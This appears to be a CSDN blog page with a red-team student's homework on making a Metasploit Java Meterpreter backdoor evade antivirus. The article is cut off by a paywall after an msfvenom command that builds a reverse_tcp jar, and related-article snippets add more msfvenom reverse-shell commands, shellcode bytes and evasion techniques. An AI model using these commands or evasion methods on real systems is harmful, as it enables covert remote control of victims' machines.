红队作业 | 免杀Meterpreter java马

最新推荐文章于 2022-07-02 23:50:27 发布
最新推荐文章于 2022-07-02 23:50:27 发布
阅读量921 收藏 1
点赞数 2
文章标签: java 编程语言 python spring jvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/122551863
版权

文章来源|MS08067 红队培训班 第5期

本文作者:aeqaq(红队培训班5期学员)


按老师要求尝试完成布置的作业如下:

目标:

分析msf meterpreter java马的原理,然后自己写一个保留了核心逻辑的,来达到免杀效果。

1.生成马

msf6 > use java/meterpreter/reverse_tcp
msf6 payload(java/meterpreter/reverse_tcp) > msfvenom -p java/meterpreter/reverse_tcp LHOST=1.117.xxxxxx  LPORT=4444 W >text.jar

2.反编译分析源码

2.1用jd-gui反编译源码导出

最低0.47元/天 解锁文章
Ms08067安全实验室
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红蓝对抗之红队免杀开发实践
悦分享
08-04 1844
我们在这个加载程序中执行的beacon shellcode最终是一个需要在内存中执行的DLL。许多C2框架利用了Stephen Fewer的。解析加载DLL所需kernel32.dll WINAPI的地址(例如VirtualAlloc, LoadLibraryA等);将DLL及其相应的节写入内存中;建立DLL导入表,以便DLL可以调用ntdll.dll和kernel32.dll WINAPI;加载额外的库并解析其导入函数地址;调用DLL的入口点。...
meterpreter工作原理到免杀方式的分析
Hello World.c
03-05 1235
Meterpreter 工作原理 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LP ORT=31012 -f c > test2.c unsigned char buf[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x89\xe5" "\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4
metasploit - java meterpreter
Nixawk
04-21 1765
msf > use payload/java/meterpreter/reverse_tcp msf payload(reverse_tcp) > show options Module options (payload/java/meterpreter/reverse_tcp): Name Current Setting Required Description ---- -
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8266
MeterpreterMetasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
红队攻防手册,红队攻防教程
最新发布
04-20
红队攻防教程是指针对网络和系统安全的实践性培训,旨在模拟真实的攻击场景并提供相关的防御技术。红队是一个模拟攻击团队,通过模拟真实的黑客攻击来测试组织的安全性,而蓝队则是负责防御和应对这些攻击的团队。 ...
红队渗透打点工具-FindUpload
03-07
红队渗透打点工具-FindUpload】 在网络安全领域,红队渗透测试是模拟黑客攻击行为,以评估组织防御能力的一种重要方法。FindUpload作为一款红队打点工具,其核心功能在于帮助渗透测试专家有效地查找和定位网络...
python反序列化-分离免杀1
08-03
在网络安全领域,尤其是渗透测试和红队行动中,反序列化被用于实现某些高级攻击技术,如远程代码执行(RCE)和免杀(防杀毒软件检测)。在本文中,我们将深入探讨如何利用 Python 反序列化进行免杀技术,特别是...
红队安全研发系列之免杀原理和绕过研究——起始 .pdf
09-05
红队安全研发系列之免杀原理和绕过研究——起始 安全架构应急响应 自动化 漏洞分析 安全人才
防伪溯源系统java源码下载-RedTeamer:红队
06-06
防伪溯源系统java源码下载 红方人员实战手册 声明 Author : By klion Date : 2020.2.15 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 ...
利用kali Linux使用meterpreter制作免杀测试入侵windows电脑
WuHao的博客
10-26 5669
前言:常规使用meterpreter制作木时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀。 首先安装Venom Venon克隆地址:https://github.com/r00t-3xp10it/venom tar.gz OR zip OR git clone 2.赋予文件可执行权限: cd venom-main sudo chmod -R +x *.sh 3.安装依赖关系包: cd aux sudo ./setup.sh 4.运行 sudo.
MSF 生成静态免杀shell(win)
嘻嘻哈哈
01-26 2618
NO.1 利用工具 msf msf全称 MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。 vc++ c编译器 实现过程 1.使用msfvenom生成shellcode msfvenom -
利用metasploit生成免杀后门
mirror97black的博客
01-26 5621
免杀 之前的博客中,有利用msf生成代码,目标机执行然后获得shell。但是现在有很多杀软,对各种木有检测机制,执行危险代码或者运行危险程序,杀软会进行阻止。 免杀有很多种方式,今天介绍一种利用msf生成shellcode免杀,编译为exe文件,这种免杀能够绕过大部分杀软 静态免杀 静态免杀是能够绕过杀软检测,运行时也不会报毒。但是执行危险命令就会报毒,比如说新建用户、进程注入等。 使
利用Metasploit制作免杀
anquanzushiye的博客
03-24 1657
请大家认真选择投票项,后续更新以此作为依据。今日更新PPT内容11个,内容:数据安全,CASB保护零信任环境的数据安全实践:https://www.se...
Bypass AV meterpreter免杀技巧
weixin_30517001的博客
03-19 1759
0x01 meterpreter简介 MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。 需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没...
Meterpreter使用总结(1)
热门推荐
CODING...
02-08 2万+
meterpreter是我最喜欢使用的攻击payload,经常都会使用windows/meterpreter/reverse_tcp作为携带的payload来进行测试,下面就meterpreter的基本使用进行一个总结:
Meterpreter使用总结(2)之后渗透攻击模块
CODING...
02-08 1万+
meterpreter虽然功能强大,作为单一的工具还是会有他功能的局限性,因此在metasploit4.0之后引入了后渗透攻击模块,通过在meterpreter中使用ruby编写的模块来进行进一步的渗透攻击。 (1)获取目标机器的分区情况: (2)判断是否为虚拟机: 如果有时候我们渗透测试的时候发现获得的目标机器是一个虚拟机,就要打醒十二分精神了,有可能这个是对方设置的一个蜜罐系统。
MSF生成后门汇总
干铮的博客
10-10 4724
可执行脚本反弹shell 1.windows下exe执行文件后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名 案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/shell.exe 监听设置: msfconsole use exploit/mul...
免杀的N种姿势-msf篇
m0_51268003的博客
04-02 3983
msf是什么?百度一下你就知道 常规参数 -p / -payload 指定payload 支持自定义payload -l / -list 指出攻击模块(payloads、encoders、nops、all)的可用资源 -n / nopsled 为payload预设一个NOP滑动长度 //NOP指令,也称作“空指令”,在x86的CPU中机器码为0x90(1...
msfvenom生成apk免杀
06-24
想要绕过Android平台上的杀毒软件,需要对apk文件进行免杀处理。Msfvenom在生成apk文件时,可以设置一些参数来达到免杀的目的。比如说,可以指定恶意应用使用的一些系统权限和组件,以逃避杀毒软件的检测。还可以在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值